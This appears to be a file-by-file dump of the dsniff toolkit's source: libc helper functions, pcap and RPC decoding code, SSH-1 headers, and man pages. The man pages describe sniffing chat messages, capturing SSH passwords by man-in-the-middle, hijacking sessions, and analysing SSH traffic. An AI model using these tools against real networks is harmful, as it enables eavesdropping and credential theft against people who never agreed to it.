 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
 * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#ifndef _LIBGEN_H_
#define _LIBGEN_H_

char *basename(const char *);
char *dirname(const char *);

#endif /* _LIBGEN_H_ */

--------------------------------------------------------------------------------
/missing/md5.h:
--------------------------------------------------------------------------------
#ifndef MD5_H
#define MD5_H

struct MD5Context {
	u_int32_t buf[4];
	u_int32_t bits[2];
	unsigned char in[64];
};

void MD5Init(struct MD5Context *context);
void MD5Update(struct MD5Context *context, unsigned char const *buf,
	       unsigned len);
void MD5Final(unsigned char digest[16], struct MD5Context *context);
void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]);

/*
 * This is needed to make RSAREF happy on some MS-DOS compilers.
 */
typedef struct MD5Context MD5_CTX;

#endif /* !MD5_H */

--------------------------------------------------------------------------------
/missing/memcmp.c:
--------------------------------------------------------------------------------
/* $Id: memcmp.c,v 1.1 2000/11/29 13:57:46 dugsong Exp $ */
/*-
 * Copyright (c) 1990 The Regents of the University of California.
 * All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Chris Torek.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <string.h>

/*
 * Compare memory regions.
 */
int
memcmp(s1, s2, n)
	const void *s1, *s2;
	size_t n;
{
	if (n != 0) {
		register const unsigned char *p1 = s1, *p2 = s2;

		do {
			if (*p1++ != *p2++)
				return (*--p1 - *--p2);
		} while (--n != 0);
	}
	return (0);
}

--------------------------------------------------------------------------------
/missing/strlcat.c:
--------------------------------------------------------------------------------
/* $Id: strlcat.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */
/* $OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $ */

/*
 * Copyright (c) 1998 Todd C. Miller
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
 * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#if defined(LIBC_SCCS) && !defined(lint)
static char *rcsid = "$OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $";
#endif /* LIBC_SCCS and not lint */

#include <sys/types.h>
#include <string.h>

/*
 * Appends src to string dst of size siz (unlike strncat, siz is the
 * full size of dst, not space left). At most siz-1 characters
 * will be copied. Always NUL terminates (unless siz == 0).
 * Returns strlen(src) + MIN(siz, strlen(initial dst)); if retval >= siz,
 * truncation occurred.
 */
size_t strlcat(dst, src, siz)
	char *dst;
	const char *src;
	size_t siz;
{
	register char *d = dst;
	register const char *s = src;
	register size_t n = siz;
	size_t dlen;

	/*
	 * Find the end of dst and adjust bytes left, but never scan past
	 * siz bytes: dst may not be NUL-terminated within its buffer.
	 */
	while (n-- != 0 && *d != '\0')
		d++;
	dlen = d - dst;
	n = siz - dlen;

	if (n == 0)
		return(dlen + strlen(s));
	while (*s != '\0') {
		if (n != 1) {
			*d++ = *s;
			n--;
		}
		s++;
	}
	*d = '\0';

	return(dlen + (s - src));	/* count does not include NUL */
}

--------------------------------------------------------------------------------
/missing/strlcat.h:
--------------------------------------------------------------------------------
size_t strlcat(char *dst, const char *src, size_t siz);

--------------------------------------------------------------------------------
/missing/strlcpy.c:
--------------------------------------------------------------------------------
/* $Id: strlcpy.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */
/* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */

/*
 * Copyright (c) 1998 Todd C. Miller
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
 * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#if defined(LIBC_SCCS) && !defined(lint)
static char *rcsid = "$OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $";
#endif /* LIBC_SCCS and not lint */

#include <sys/types.h>
#include <string.h>

/*
 * Copy src to string dst of size siz. At most siz-1 characters
 * will be copied. Always NUL terminates (unless siz == 0).
 * Returns strlen(src); if retval >= siz, truncation occurred.
 */
size_t strlcpy(dst, src, siz)
	char *dst;
	const char *src;
	size_t siz;
{
	register char *d = dst;
	register const char *s = src;
	register size_t n = siz;

	if (n == 0)
		return(strlen(s));
	while (*s != '\0') {
		if (n != 1) {
			*d++ = *s;
			n--;
		}
		s++;
	}
	*d = '\0';

	return(s - src);	/* count does not include NUL */
}

--------------------------------------------------------------------------------
/missing/strlcpy.h:
--------------------------------------------------------------------------------
size_t strlcpy(char *dst, const char *src, size_t siz);

--------------------------------------------------------------------------------
/missing/strsep.c:
--------------------------------------------------------------------------------
/* $Id: strsep.c,v 1.1 2000/11/28 18:26:52 dugsong Exp $ */
/* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */

/*-
 * Copyright (c) 1990, 1993
 *	The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <string.h>
#include <stdio.h>

/*
 * Get next token from string *stringp, where tokens are possibly-empty
 * strings separated by characters from delim.
 *
 * Writes NULs into the string at *stringp to end tokens.
 * delim need not remain constant from call to call.
 * On return, *stringp points past the last NUL written (if there might
 * be further tokens), or is NULL (if there are definitely no more tokens).
 *
 * If *stringp is NULL, strsep returns NULL.
 */
char *
strsep(stringp, delim)
    register char **stringp;
    register const char *delim;
{
    register char *s;
    register const char *spanp;
    register int c, sc;
    char *tok;

    if ((s = *stringp) == NULL)
        return (NULL);
    for (tok = s;;) {
        c = *s++;
        spanp = delim;
        do {
            if ((sc = *spanp++) == c) {
                if (c == 0)
                    s = NULL;
                else
                    s[-1] = 0;
                *stringp = s;
                return (tok);
            }
        } while (sc != 0);
    }
    /* NOTREACHED */
}
--------------------------------------------------------------------------------
/mount.c:
--------------------------------------------------------------------------------
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */

#include "mount.h"

bool_t
xdr_fhandle (XDR *xdrs, fhandle objp)
{
    register int32_t *buf;

    if (!xdr_opaque (xdrs, objp, FHSIZE))
        return FALSE;
    return TRUE;
}

bool_t
xdr_fhandle3 (XDR *xdrs, fhandle3 *objp)
{
    register int32_t *buf;

    if (!xdr_bytes (xdrs, (char **)&objp->fhandle3_val, (u_int *) &objp->fhandle3_len, FHSIZE3))
        return FALSE;
    return TRUE;
}

bool_t
xdr_fhstatus (XDR *xdrs, fhstatus *objp)
{
    register int32_t *buf;

    if (!xdr_u_int (xdrs, &objp->fhs_status))
        return FALSE;
    switch (objp->fhs_status) {
    case 0:
        if (!xdr_fhandle (xdrs, objp->fhstatus_u.fhs_fhandle))
            return FALSE;
        break;
    default:
        break;
    }
    return TRUE;
}

#define fhs_fh fhstatus_u.fhs_fhandle

bool_t
xdr_mountstat3 (XDR *xdrs, mountstat3 *objp)
{
    register int32_t *buf;

    if (!xdr_enum (xdrs, (enum_t *) objp))
        return FALSE;
    return TRUE;
}

bool_t
xdr_mountres3_ok (XDR *xdrs, mountres3_ok *objp)
{
    register int32_t *buf;

    if (!xdr_fhandle3 (xdrs, &objp->fhandle))
        return FALSE;
    if (!xdr_array (xdrs, (char **)&objp->auth_flavors.auth_flavors_val, (u_int *) &objp->auth_flavors.auth_flavors_len, ~0,
        sizeof (int), (xdrproc_t) xdr_int))
        return FALSE;
    return TRUE;
}

bool_t
xdr_mountres3 (XDR *xdrs, mountres3 *objp)
{
    register int32_t *buf;

    if (!xdr_mountstat3 (xdrs, &objp->fhs_status))
        return FALSE;
    switch (objp->fhs_status) {
    case MNT_OK:
        if (!xdr_mountres3_ok (xdrs, &objp->mountres3_u.mountinfo))
            return FALSE;
        break;
    default:
        break;
    }
    return TRUE;
}

bool_t
xdr_dirpath (XDR *xdrs, dirpath *objp)
{
    register int32_t *buf;

    if (!xdr_string (xdrs, objp, MNTPATHLEN))
        return FALSE;
    return TRUE;
}
--------------------------------------------------------------------------------
/msgsnarf.8:
--------------------------------------------------------------------------------
.TH MSGSNARF 8
.ad
.fi
.SH NAME
msgsnarf
\-
sniff chat messages
.SH SYNOPSIS
.na
.nf
.fi
\fBmsgsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern\fR [\fIexpression\fR]]
.SH DESCRIPTION
.ad
.fi
\fBmsgsnarf\fR records selected messages from AOL Instant
Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat
sessions.
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP "\fB-p \fIpcapfile\fR"
Process packets from the specified PCAP capture file instead of the network.
.IP \fB-v\fR
"Versus" mode. Invert the sense of matching, to select non-matching
messages.
.IP \fIpattern\fR
Specify regular expression for message matching.
.IP "\fIexpression\fR"
Specify a tcpdump(8) filter expression to select traffic to sniff.
.SH "SEE ALSO"
dsniff(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/options.h:
--------------------------------------------------------------------------------
/*
 * options.h
 *
 * Global options.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: options.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef OPTIONS_H
#define OPTIONS_H

extern int Opt_client;
extern u_short Opt_dns;
extern int Opt_debug;
extern int Opt_magic;
extern int Opt_read;
extern int Opt_write;
extern int Opt_snaplen;
extern int Opt_lines;
extern int Opt_verbose;
extern int Opt_show_dups;
extern int Opt_color;

#endif /* OPTIONS_H */
--------------------------------------------------------------------------------
/pathnames.h:
--------------------------------------------------------------------------------
/*
 * pathnames.h
 *
 * dsniff pathnames.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: pathnames.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef PATHNAMES_H
#define PATHNAMES_H

#ifndef DSNIFF_LIBDIR
#define DSNIFF_LIBDIR "/usr/share/dsniff/"
#endif

#define DSNIFF_SERVICES "dsniff.services"
#define DSNIFF_MAGIC "dsniff.magic"

#endif /* PATHNAMES_H */
--------------------------------------------------------------------------------
/pcaputil.c:
--------------------------------------------------------------------------------
/*
 * pcaputil.c
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: pcaputil.c,v 1.2 2001/03/15 08:33:04 dugsong Exp $
 */

#include "config.h"

#include <sys/param.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#if defined(BSD) && !defined(__FreeBSD__)
# define WITH_BPF 1
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <pcap.h>
#ifdef WITH_BPF
# include <pcap-int.h>
#endif

#include "pcaputil.h"

#ifdef WITH_BPF
static int
bpf_immediate(int fd, int on)
{
    return (ioctl(fd, BIOCIMMEDIATE, &on));
}
#endif

/* Return the link-layer header length for pd's datalink type, or -1. */
int
pcap_dloff(pcap_t *pd)
{
    int offset = -1;

    switch (pcap_datalink(pd)) {
    case DLT_EN10MB:
        offset = 14;
        break;
    case DLT_IEEE802:
        offset = 22;
        break;
    case DLT_FDDI:
        offset = 21;
        break;
#ifdef DLT_LOOP
    case DLT_LOOP:
#endif
    case DLT_NULL:
        offset = 4;
        break;
    case DLT_LINUX_SLL: /* e.g. ppp */
        offset = 16;
        break;
    default:
        warnx("unsupported datalink type");
        break;
    }
    return (offset);
}

pcap_t *
pcap_init_dsniff(char *intf, char *filter, int snaplen)
{
    pcap_t *pd;
    u_int net, mask;
    struct bpf_program fcode;
    char ebuf[PCAP_ERRBUF_SIZE];

    if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) {
        warnx("%s", ebuf);
        return (NULL);
    }
    if ((pd = pcap_open_live(intf, snaplen, 1, 512, ebuf)) == NULL) {
        warnx("%s", ebuf);
        return (NULL);
    }
    if (pcap_lookupnet(intf, &net, &mask, ebuf) == -1) {
        warnx("%s", ebuf);
        return (NULL);
    }
    if (pcap_compile(pd, &fcode, filter, 1, mask) < 0) {
        pcap_perror(pd, "pcap_compile");
        return (NULL);
    }
    if (pcap_setfilter(pd, &fcode) == -1) {
        pcap_perror(pd, "pcap_setfilter");
        return (NULL);
    }
#ifdef WITH_BPF
    if (bpf_immediate(pd->fd, 1) < 0) {
        perror("ioctl");
        return (NULL);
    }
#endif
    return (pd);
}

/* from tcpdump util.c. */
char *
copy_argv(char **argv)
{
    char **p, *buf, *src, *dst;
    u_int len = 0;

    p = argv;
    if (*p == 0)
        return (0);

    while (*p)
        len += strlen(*p++) + 1;

    if ((buf = (char *)malloc(len)) == NULL)
        err(1, "copy_argv: malloc");

    p = argv;
    dst = buf;

    while ((src = *p++) != NULL) {
        while ((*dst++ = *src++) != '\0')
            ;
        dst[-1] = ' ';
    }
    dst[-1] = '\0';

    return (buf);
}
--------------------------------------------------------------------------------
/pcaputil.h:
--------------------------------------------------------------------------------
/*
 * pcaputil.h
 *
 * pcap utility routines.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: pcaputil.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef PCAPUTIL_H
#define PCAPUTIL_H

pcap_t *pcap_init_dsniff(char *intf, char *filter, int snaplen);

int pcap_dloff(pcap_t *pd);

char *copy_argv(char **argv);

#endif /* PCAPUTIL_H */
--------------------------------------------------------------------------------
/record.h:
--------------------------------------------------------------------------------
/*
 * record.h
 *
 * Record interface.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: record.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef RECORD_H
#define RECORD_H

int record_init(char *file);

int record(u_int32_t src, u_int32_t dst, int proto, u_short sport,
    u_short dport, char *name, u_char *buf, int len);

void record_dump(void);

void record_close(void);

#endif /* RECORD_H */
--------------------------------------------------------------------------------
/remote.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackerschoice/dsniff/da38bf437899cc1fbb8d7590a5f62c53a2f411fa/remote.c
--------------------------------------------------------------------------------
/rpc.c:
--------------------------------------------------------------------------------
/*
 * rpc.c
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: rpc.c,v 1.8 2001/03/15 08:33:04 dugsong Exp $
 */

#include "config.h"

#include <sys/types.h>
#include <rpc/rpc.h>

#include <stdio.h>
#include <string.h>

#include "decode.h"
#include "rpc.h"

#define XIDMAPSIZE 64

static struct xid_map xid_maps[XIDMAPSIZE];

static int xid_map_next = 0;
static int xid_map_hint = 0;

/* xid_map adapted from tcpdump's print-nfs.c */

void
xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers,
    u_int32_t proc, void *data)
{
    struct xid_map *mp;

    /* Fixed-size ring: the oldest entry is overwritten once it wraps. */
    mp = &xid_maps[xid_map_next];

    if (++xid_map_next >= XIDMAPSIZE)
        xid_map_next = 0;

    mp->xid = xid;
    mp->prog = prog;
    mp->vers = vers;
    mp->proc = proc;
    mp->data = data;
}

struct xid_map *
xid_map_find(int xid)
{
    struct xid_map *mp;
    int i;

    /* Start searching from where we last left off. */
    i = xid_map_hint;
    do {
        mp = &xid_maps[i];
        if (mp->xid == xid) {
            /* match */
            xid_map_hint = i;
            return (mp);
        }
        if (++i >= XIDMAPSIZE)
            i = 0;
    } while (i != xid_map_hint);

    return (NULL);
}

int
rpc_decode(u_char *buf, int len, struct rpc_msg *msg)
{
    XDR xdrs;
    u_int32_t fraghdr;
    u_char *p, *tmp;
    int stat, tmplen;

    if (len < 20)
        return (0);

    p = buf + 4;

    /* If not recognizably RPC, try TCP record defragmentation */
    if (pntohl(p) != CALL && pntohl(p) != REPLY) {
        tmp = buf;
        tmplen = 0;

        for (;;) {
            fraghdr = pntohl(tmp);

            if (FRAGLEN(fraghdr) + 4 > len)
                return (0);

            len -= 4;
            memmove(tmp, tmp + 4, len);
            tmplen += FRAGLEN(fraghdr);

            if (LASTFRAG(fraghdr))
                break;

            tmp += FRAGLEN(fraghdr);
            len -= FRAGLEN(fraghdr);

            if (len < 4)
                return (0);
        }
        len = tmplen;
    }
    /* Decode RPC message. */
    memset(msg, 0, sizeof(*msg));

    if (ntohl(((struct rpc_msg *)buf)->rm_direction) == CALL) {
        xdrmem_create(&xdrs, buf, len, XDR_DECODE);

        if (!xdr_callmsg(&xdrs, msg)) {
            xdr_destroy(&xdrs);
            return (0);
        }
    }
    else if (ntohl(((struct rpc_msg *)buf)->rm_direction) == REPLY) {
        msg->acpted_rply.ar_results.proc = (xdrproc_t) xdr_void;
        xdrmem_create(&xdrs, buf, len, XDR_DECODE);

        if (!xdr_replymsg(&xdrs, msg)) {
            xdr_destroy(&xdrs);
            return (0);
        }
    }
    else
        return (0);

    stat = xdr_getpos(&xdrs);
    xdr_destroy(&xdrs);

    return (stat);
}
--------------------------------------------------------------------------------
/rpc.h:
--------------------------------------------------------------------------------
/*
 * rpc.h
 *
 * RPC utility routines.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: rpc.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef RPC_H
#define RPC_H

/* Record-marking header: low 31 bits = fragment length, top bit = last fragment. */
#define FRAGLEN(x) ((x) & 0x7fffffff)
#define LASTFRAG(x) ((x) & (1U << 31))

struct xid_map {
    u_int32_t xid;
    u_int32_t prog;
    u_int32_t vers;
    u_int32_t proc;
    void *data;
};

int rpc_decode(u_char *buf, int len, struct rpc_msg *msg);

void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers,
    u_int32_t proc, void *data);

struct xid_map *xid_map_find(int xid);

#endif /* RPC_H */
--------------------------------------------------------------------------------
/ssh.h:
--------------------------------------------------------------------------------
/*
 * ssh.h
 *
 * Minimal SSH-1 protocol implementation.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: ssh.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef SSH_H
#define SSH_H

#define SSH_MAX_PADLEN 8
#define SSH_MAX_PKTLEN 262144

/* Authentication types. */
#define SSH_AUTH_PASSWORD 3

/* Cipher types. */
#define SSH_CIPHER_NONE 0
#define SSH_CIPHER_3DES 3
#define SSH_CIPHER_BLOWFISH 6

/* Message types. */
#define SSH_MSG_DISCONNECT 1
#define SSH_SMSG_PUBLIC_KEY 2
#define SSH_CMSG_SESSION_KEY 3
#define SSH_CMSG_USER 4
#define SSH_CMSG_AUTH_PASSWORD 9
#define SSH_SMSG_SUCCESS 14
#define SSH_SMSG_FAILURE 15
#define SSH_CMSG_STDIN_DATA 16
#define SSH_SMSG_STDOUT_DATA 17
#define SSH_SMSG_STDERR_DATA 18
#define SSH_SMSG_EXITSTATUS 20

typedef struct ssh_ctx {
    int authmask;
    int encmask;
    RSA *servkey;
    RSA *hostkey;
} SSH_CTX;

typedef struct ssh {
    int fd;
    SSH_CTX *ctx;
    u_char sesskey[32];
    void *estate;
    void *dstate;
    void (*encrypt)(u_char *src, u_char *dst, int len, void *state);
    void (*decrypt)(u_char *src, u_char *dst, int len, void *state);
} SSH;

void SSH_init(void);

SSH_CTX *SSH_CTX_new(void);

SSH *SSH_new(SSH_CTX *ctx);

void SSH_set_fd(SSH *ssh, int fd);

int SSH_accept(SSH *ssh);

int SSH_connect(SSH *ssh);

int SSH_recv(SSH *ssh, u_char *buf, int size);

int SSH_send(SSH *ssh, u_char *buf, int len);

void SSH_close(SSH *ssh);

#endif /* SSH_H */
--------------------------------------------------------------------------------
/sshcrypto.h:
--------------------------------------------------------------------------------
/*
 * sshcrypto.h
 *
 * SSH-1 crypto routines, adapted from OpenSSH.
 *
 * Copyright (c) 2000 Dug Song
 * Copyright (c) 2000 Niels Provos
 * Copyright (c) 2000 Markus Friedl
 *
 * $Id: sshcrypto.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef SSHCRYPTO_H
#define SSHCRYPTO_H

void rsa_public_encrypt(BIGNUM *src, BIGNUM *dst, RSA *key);
void rsa_private_decrypt(BIGNUM *src, BIGNUM *dst, RSA *key);

void *blowfish_init(u_char *sesskey, int len);
void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state);
void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state);

void *des3_init(u_char *sesskey, int len);
void des3_encrypt(u_char *src, u_char *dst, int len, void *state);
void des3_decrypt(u_char *src, u_char *dst, int len, void *state);

#endif /* SSHCRYPTO_H */
--------------------------------------------------------------------------------
/sshmitm.8:
--------------------------------------------------------------------------------
.TH SSHMITM 8
.ad
.fi
.SH NAME
sshmitm
\-
SSH monkey-in-the-middle
.SH SYNOPSIS
.na
.nf
.fi
\fBsshmitm\fR [\fB-d\fR] [\fB-I\fR] [\fB-p \fIport\fR] host [\fIport\fR]
.SH DESCRIPTION
.ad
.fi
\fBsshmitm\fR proxies and sniffs SSH traffic redirected by
dnsspoof(8), capturing SSH password logins, and optionally hijacking
interactive sessions. Only SSH protocol version 1 is (or ever will be)
supported - this program is far too evil already.
.SH OPTIONS
.IP \fB-d\fR
Enable verbose debugging output.
.IP \fB-I\fR
Monitor / hijack an interactive session.
.IP "\fB-p \fIport\fR"
Specify the local port to listen on.
.IP \fIhost\fR
Specify the remote host to relay connections to.
.IP \fIport\fR
Specify the remote port to relay connections to.
.SH "SEE ALSO"
dsniff(8), dnsspoof(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/sshow.8:
--------------------------------------------------------------------------------
.TH SSHOW 8
.ad
.fi
.SH NAME
sshow
\-
SSH traffic analysis tool
.SH SYNOPSIS
.na
.nf
.fi
\fBsshow\fR [\fB-d\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fIexpression\fR]
.SH DESCRIPTION
.ad
.fi
\fBsshow\fR analyzes encrypted SSH-1 and SSH-2 traffic, identifying
authentication attempts, the lengths of passwords entered in
interactive sessions, and command line lengths.
.LP
The following advisory describes the attacks implemented by
\fBsshow\fR in detail:
.LP
.RS
.I http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt
.RE
.SH OPTIONS
.IP \fB-d\fR
Enable verbose debugging output.
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP "\fB-p \fIpcapfile\fR"
Process packets from the specified PCAP capture file instead of the network.
.IP "\fIexpression\fR"
Specify a tcpdump(8) filter expression to select traffic to sniff.
.SH "SEE ALSO"
dsniff(8), sshmitm(8)
.SH AUTHORS
.na
.nf
Solar Designer
Dug Song
--------------------------------------------------------------------------------
/tcp_raw.h:
--------------------------------------------------------------------------------
/*
 * tcp_raw.h
 *
 * Raw (best-effort, half-duplex) TCP reassembly. Haaacccck.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: tcp_raw.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef TCP_RAW_H
#define TCP_RAW_H

typedef void (*tcp_raw_callback_t)(in_addr_t src, in_addr_t dst,
    u_short sport, u_short dport,
    u_char *buf, int len);

struct iovec *tcp_raw_input(struct libnet_ipv4_hdr *ip,
    struct libnet_tcp_hdr *tcp, int len);

void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback);

#endif /* TCP_RAW_H */
--------------------------------------------------------------------------------
/tcpkill.8:
--------------------------------------------------------------------------------
